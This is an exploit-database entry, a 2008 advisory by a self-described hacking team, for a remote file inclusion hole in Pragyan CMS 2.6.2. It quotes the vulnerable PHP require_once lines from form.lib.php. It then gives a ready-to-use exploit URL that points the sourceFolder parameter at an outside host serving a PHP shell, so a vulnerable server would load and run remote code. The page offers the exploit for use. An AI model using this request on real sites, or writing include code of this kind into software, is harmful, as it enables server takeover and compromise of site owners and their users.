[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

Author
N3TR00T3R
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3411
Category
web applications
Date add
14-07-2008
Platform
unsorted
====================================================================
Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
====================================================================



                                         << In The Name Of GOD >>


                  -------------------------------------------------------------
                   -               [ Persian Boys Hacking Team ] -:- 2008
                   -
                   - discovered by N3TR00T3R 
                   - pragyan 2.6.2 Remote File Includion
                   - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
                              r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
                              Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
                  --------------------------------------------------------------

if register_globals = On;


Vul Code : [/cms/modules/form.lib.php]
##########################################################
#global $sourceFolder;
#global $moduleFolder;
#require_once("$sourceFolder/$moduleFolder/form/editform.php");
#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
##########################################################

Exploit : 

##########################################################
#
# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
#
##########################################################



#  0day.today [2024-12-26]  #